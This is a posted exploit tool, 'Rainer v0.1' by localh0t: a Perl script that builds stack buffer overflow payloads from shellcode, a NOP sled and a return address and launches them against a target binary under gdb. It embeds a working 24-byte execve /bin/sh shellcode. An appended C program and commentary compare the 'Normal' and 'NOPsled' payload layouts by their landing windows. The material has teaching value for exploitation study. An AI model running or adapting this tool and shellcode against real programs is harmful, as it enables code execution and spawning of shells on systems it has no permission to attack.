Rainer v0.1 by localh0t
Source: mattdch0@gmail.com  Author: localh0t  Published: 2011-08-30
#!/usr/local/bin/perl
 
# Author: localh0t
# Date: 18/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch

use strict;
use warnings;

# Help (the three required options -t, -n and -r need six arguments)
if (@ARGV < 6)
        {
                 print "\n\n###########################";
                 print "\n# Rainer v0.1 by localh0t #";
                 print "\n###########################";
                 print "\n\nUse: perl $0 -t [BINARY TARGET] -s [SHELLCODE (Optional)] -n [NOP's AMOUNT] -r [RETURN ADDRESS] -m [RETURN METHOD (Optional)]\n";
                 print "Example: perl $0 -t ExploitMe -s \"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" -n 60 -r \"\\xb8\\xf3\\xff\\xbf\" -m Normal\n";
                 print "\nNote #1: If shellcode not defined, default to: 24 bytes /bin/sh shellcode.\n";
                 print "Note #2: If method not defined, normal method will be used.\n\n";
                 print "Methods:\n========\n";
                 print "Normal : shellcode + nops + ret + null\n";
                 print "NOPsled: nops + shellcode + ret + null\n\n";
                 exit(0);
        }

# Default shellcode, 24 bytes /bin/sh. Written as printf escapes (single-quoted,
# not raw bytes) so that it is handled exactly like a shellcode passed with -s.
my $default = '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80';

# Options stay undef until set (a list assignment "= -1" only fills the first one)
my ($bin, $shell, $na, $ret, $meth);

# Giving values to variables: each switch takes the argument that follows it
my $arg = 0;
foreach my $loop (@ARGV) {
        for ($loop) {
                /^-t$/ and do { $bin   = $ARGV[$arg+1]; last; };
                /^-s$/ and do { $shell = $ARGV[$arg+1]; last; };
                /^-n$/ and do { $na    = $ARGV[$arg+1]; last; };
                /^-r$/ and do { $ret   = $ARGV[$arg+1]; last; };
                /^-m$/ and do { $meth  = $ARGV[$arg+1]; last; };
        }
        $arg++;
}

# Required options
die "Missing -t, -n or -r (run without arguments for help)\n"
        unless defined $bin && defined $na && defined $ret;
die "NOP amount must be a non-negative integer\n" unless $na =~ /^\d+$/;

# If shellcode not present, default used (the original tested "$shell = -1",
# an assignment that is always true, so -s was silently ignored)
$shell = $default unless defined $shell;
$meth  = 'Normal' unless defined $meth;

# NOPs payload, as printf escapes like the rest of the bytes
my $nops = '\x90' x $na;

# Function: wrap the bytes in a gdb command line. bash's printf builtin expands
# the \xHH escapes; the substitution is double-quoted so that bytes such as
# 0x20 or 0x09 do not split the argument into several. The trailing NULs of the
# original layouts are kept, but the shell discards them (argv strings cannot
# contain 0x00), so "+ null" never reaches the target.
sub build {
        my ($bin, $bytes) = @_;
        return 'gdb --eval-command="run" --args '.$bin.' "$(printf \''.$bytes.'\x00\x00\x00\x00\')"';
}

# Main: pick the byte layout
my $bytes;
for ($meth) {
  /^Normal$/  and do { $bytes = $shell.$nops.$ret; last; };
  /^NOPsled$/ and do { $bytes = $nops.$shell.$ret; last; };
  die "Unknown method '$meth' (use Normal or NOPsled)\n";
}
my $payload = build($bin, $bytes);

# Run through bash explicitly: /bin/sh may be dash, whose printf has no \xHH
exec('bash', '-c', $payload) or die "exec bash: $!\n";

__END__
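The two layouts in the help text (Normal: shellcode + nops + ret; NOPsled: nops + shellcode + ret) differ in how forgiving they are of an imprecise return address, which the tool itself does not show. The C program below is an added example, not part of Rainer or localh0t's code: it builds both layouts around the same 24-byte /bin/sh shellcode and then counts, for every offset in the buffer, whether execution landing there reaches the shellcode intact (a 0x90 is a one-byte NOP that falls through to the next byte). The NOP count of 60 and the return address 0xbffff3b8 are constructed values for the demonstration.

```c
/* Added example (not part of Rainer): build the Normal and NOPsled layouts
 * and measure how many landing offsets reach the shellcode in each. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NOP 0x90
#define SHELLCODE_LEN 24

/* The 24-byte execve("/bin//sh") shellcode Rainer uses by default. */
static const uint8_t SHELLCODE[SHELLCODE_LEN + 1] =
    "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

enum layout { LAYOUT_NORMAL, LAYOUT_NOPSLED };

/* Scratch buffer, large enough for the examples below. */
static uint8_t g_buf[4096];

/* Assemble shellcode, NOP padding and the little-endian return address in
 * the order the chosen layout prescribes; returns the payload length.
 * Rainer also appends four NUL bytes, but those cannot travel through
 * argv, so they are not modelled here. */
size_t build_payload(enum layout l, size_t nops, uint32_t ret, uint8_t *out)
{
    size_t off = 0;
    if (l == LAYOUT_NORMAL) {
        memcpy(out + off, SHELLCODE, SHELLCODE_LEN); off += SHELLCODE_LEN;
        memset(out + off, NOP, nops);                off += nops;
    } else {
        memset(out + off, NOP, nops);                off += nops;
        memcpy(out + off, SHELLCODE, SHELLCODE_LEN); off += SHELLCODE_LEN;
    }
    for (int i = 0; i < 4; i++)          /* x86 stores the address LSB first */
        out[off++] = (uint8_t)(ret >> (8 * i));
    return off;
}

/* Model execution starting at buf[land]: every 0x90 falls through to the
 * next byte, so the first non-NOP byte must begin the intact shellcode. */
int lands_on_shellcode(const uint8_t *buf, size_t len, size_t land)
{
    size_t i = land;
    while (i < len && buf[i] == NOP)
        i++;
    if (i + SHELLCODE_LEN > len)
        return 0;
    return memcmp(buf + i, SHELLCODE, SHELLCODE_LEN) == 0;
}

/* Number of byte offsets in the payload from which execution reaches the
 * shellcode, i.e. how far off the guessed return address may be. */
size_t landing_window(enum layout l, size_t nops)
{
    if (nops > sizeof g_buf - SHELLCODE_LEN - 4)
        return 0;
    /* 0xbffff3b8 is a constructed stack address, not one from a real target */
    size_t len = build_payload(l, nops, 0xbffff3b8u, g_buf);
    size_t good = 0;
    for (size_t off = 0; off < len; off++)
        good += lands_on_shellcode(g_buf, len, off);
    return good;
}

int main(void)
{
    printf("Normal  (60 NOPs): %zu usable landing offset(s)\n",
           landing_window(LAYOUT_NORMAL, 60));
    printf("NOPsled (60 NOPs): %zu usable landing offset(s)\n",
           landing_window(LAYOUT_NOPSLED, 60));
    return 0;
}
```

With 60 NOPs the Normal layout has a landing window of one byte: the return address must hit the first shellcode byte, because landing in the padding slides into the saved-EIP bytes rather than into code. The NOPsled layout gives 61 usable offsets (the sled plus the shellcode start). Neither layout computes the distance to the saved return address; -n still has to be chosen so that the bytes before the address end exactly where the saved EIP sits.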
 